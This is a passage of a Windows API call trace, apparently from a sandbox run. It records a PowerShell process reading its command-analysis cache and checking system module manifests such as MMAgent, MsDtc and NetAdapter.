(lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6bea9096-37d0-4e77-b7de-7ff84865f3cc" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_6bea9096-37d0-4e77-b7de-7ff84865f3cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa10 [0282.468] GetFileType (hFile=0xa10) returned 0x1 [0282.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.468] GetFileType (hFile=0xa10) returned 0x1 [0282.469] ReadFile (in: hFile=0xa10, lpBuffer=0x25b5c7caf88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7caf88*, lpNumberOfBytesRead=0x653ef8d338*=0x710, lpOverlapped=0x0) returned 1 [0282.471] ReadFile (in: hFile=0xa10, lpBuffer=0x25b5c7caf88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7caf88*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.471] CloseHandle (hObject=0xa10) returned 1 [0282.471] ReleaseMutex (hMutex=0xa0c) returned 1 [0282.471] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", lpFilePart=0x0) returned 0x47 [0282.471] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.471] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.471] CoTaskMemFree (pv=0x25b73d01680) [0282.471] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01020 [0282.471] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01020 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.471] CoTaskMemFree (pv=0x25b73d01020) [0282.471] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.471] GetCurrentProcess () returned 0xffffffffffffffff [0282.472] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa10) returned 1 [0282.472] GetTokenInformation (in: TokenHandle=0xa10, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.472] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984a70 [0282.472] GetTokenInformation (in: TokenHandle=0xa10, TokenInformationClass=0x1, TokenInformation=0x25b73984a70, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984a70, ReturnLength=0x653ef8d6b8) returned 1 [0282.472] LocalFree (hMem=0x25b73984a70) returned 0x0 [0282.472] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7cfd70, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7cfd70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.472] CreateMutexW (lpMutexAttributes=0x25b5c7cfec0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa14 [0282.473] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa14, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.473] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01ce0 [0282.473] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.473] CoTaskMemFree (pv=0x25b73d01ce0) [0282.473] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", lpFilePart=0x0) returned 0x47 [0282.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.473] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7d0508 | out: lpFileInformation=0x25b5c7d0508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e)) returned 1 [0282.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.473] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.473] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.474] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_ece04130-8f57-4b2b-a42c-0289d56c3611", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_ece04130-8f57-4b2b-a42c-0289d56c3611", lpFilePart=0x0) returned 0x93 [0282.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.474] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_ece04130-8f57-4b2b-a42c-0289d56c3611" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_ece04130-8f57-4b2b-a42c-0289d56c3611"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa18 [0282.474] GetFileType (hFile=0xa18) returned 0x1 [0282.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.474] GetFileType (hFile=0xa18) returned 0x1 [0282.475] ReadFile (in: hFile=0xa18, lpBuffer=0x25b5c7d1788, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7d1788*, lpNumberOfBytesRead=0x653ef8d338*=0x3e0, lpOverlapped=0x0) returned 1 [0282.477] ReadFile (in: hFile=0xa18, lpBuffer=0x25b5c7d1788, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7d1788*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.477] CloseHandle (hObject=0xa18) returned 1 [0282.477] ReleaseMutex (hMutex=0xa14) returned 1 [0282.477] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", lpFilePart=0x0) returned 0x43 [0282.477] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.477] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.478] CoTaskMemFree (pv=0x25b73d007a0) [0282.478] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb4c0 [0282.478] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb4c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.478] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.478] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.478] GetCurrentProcess () returned 0xffffffffffffffff [0282.478] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa18) returned 1 [0282.478] GetTokenInformation (in: TokenHandle=0xa18, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.478] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984d70 [0282.478] GetTokenInformation (in: TokenHandle=0xa18, TokenInformationClass=0x1, TokenInformation=0x25b73984d70, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984d70, ReturnLength=0x653ef8d6b8) returned 1 [0282.479] LocalFree (hMem=0x25b73984d70) returned 0x0 [0282.479] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7d5a70, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7d5a70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.479] CreateMutexW (lpMutexAttributes=0x25b5c7d5bc0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa1c [0282.479] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa1c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.479] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0282.479] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.479] CoTaskMemFree (pv=0x25b73cfa3c0) [0282.479] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", lpFilePart=0x0) returned 0x43 [0282.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.480] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7d6200 | out: lpFileInformation=0x25b5c7d6200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006)) returned 1 [0282.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.480] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.480] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.480] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_7c634d95-6d15-47e9-80e3-bdae55b262c8", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_7c634d95-6d15-47e9-80e3-bdae55b262c8", lpFilePart=0x0) returned 0x93 [0282.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.480] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_7c634d95-6d15-47e9-80e3-bdae55b262c8" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_7c634d95-6d15-47e9-80e3-bdae55b262c8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa20 [0282.481] GetFileType (hFile=0xa20) returned 0x1 [0282.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.481] GetFileType (hFile=0xa20) returned 0x1 [0282.481] ReadFile (in: hFile=0xa20, lpBuffer=0x25b5c7d7470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7d7470*, lpNumberOfBytesRead=0x653ef8d338*=0x1000, lpOverlapped=0x0) returned 1 [0282.483] ReadFile (in: hFile=0xa20, lpBuffer=0x25b5c7d926d, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x653ef8cf68, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7d926d*, lpNumberOfBytesRead=0x653ef8cf68*=0x10, lpOverlapped=0x0) returned 1 [0282.483] ReadFile (in: hFile=0xa20, lpBuffer=0x25b5c7d7470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d008, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7d7470*, lpNumberOfBytesRead=0x653ef8d008*=0x332, lpOverlapped=0x0) returned 1 [0282.483] ReadFile (in: hFile=0xa20, lpBuffer=0x25b5c7d7470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7d7470*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.484] CloseHandle (hObject=0xa20) returned 1 [0282.484] ReleaseMutex (hMutex=0xa1c) returned 1 [0282.484] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", lpFilePart=0x0) returned 0x4d [0282.484] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb4c0 [0282.484] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb4c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.484] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.484] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff040 [0282.484] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff040 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.484] CoTaskMemFree (pv=0x25b73cff040) [0282.484] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.484] GetCurrentProcess () returned 0xffffffffffffffff [0282.485] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa20) returned 1 [0282.485] GetTokenInformation (in: TokenHandle=0xa20, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.485] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739848f0 [0282.485] GetTokenInformation (in: TokenHandle=0xa20, TokenInformationClass=0x1, TokenInformation=0x25b739848f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739848f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.485] LocalFree (hMem=0x25b739848f0) returned 0x0 [0282.485] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7df138, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7df138*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.485] CreateMutexW (lpMutexAttributes=0x25b5c7df288, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa24 [0282.485] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa24, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.487] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc7e0 [0282.487] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc7e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.487] CoTaskMemFree (pv=0x25b73cfc7e0) [0282.487] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", lpFilePart=0x0) returned 0x4d [0282.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.487] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7df8d8 | out: lpFileInformation=0x25b5c7df8d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa)) returned 1 [0282.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.487] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.487] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.487] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6126176f-a9a8-48b2-8431-ba947b6c601c", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6126176f-a9a8-48b2-8431-ba947b6c601c", lpFilePart=0x0) returned 0x93 [0282.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.488] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6126176f-a9a8-48b2-8431-ba947b6c601c" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_6126176f-a9a8-48b2-8431-ba947b6c601c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa28 [0282.488] GetFileType (hFile=0xa28) returned 0x1 [0282.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.488] GetFileType (hFile=0xa28) returned 0x1 [0282.488] ReadFile (in: hFile=0xa28, lpBuffer=0x25b5c7e0b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7e0b68*, lpNumberOfBytesRead=0x653ef8d338*=0x1000, lpOverlapped=0x0) returned 1 [0282.491] ReadFile (in: hFile=0xa28, lpBuffer=0x25b5c7e295c, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x653ef8cf68, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7e295c*, lpNumberOfBytesRead=0x653ef8cf68*=0x19, lpOverlapped=0x0) returned 1 [0282.491] ReadFile (in: hFile=0xa28, lpBuffer=0x25b5c7e0b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d008, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7e0b68*, lpNumberOfBytesRead=0x653ef8d008*=0xf12, lpOverlapped=0x0) returned 1 [0282.492] ReadFile (in: hFile=0xa28, lpBuffer=0x25b5c7e0b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7e0b68*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.492] CloseHandle (hObject=0xa28) returned 1 [0282.492] ReleaseMutex (hMutex=0xa24) returned 1 [0282.492] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", lpFilePart=0x0) returned 0x53 [0282.492] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0282.492] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.492] CoTaskMemFree (pv=0x25b73cfee20) [0282.492] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d00e00 [0282.492] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d00e00 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.492] CoTaskMemFree (pv=0x25b73d00e00) [0282.492] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.492] GetCurrentProcess () returned 0xffffffffffffffff [0282.492] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, 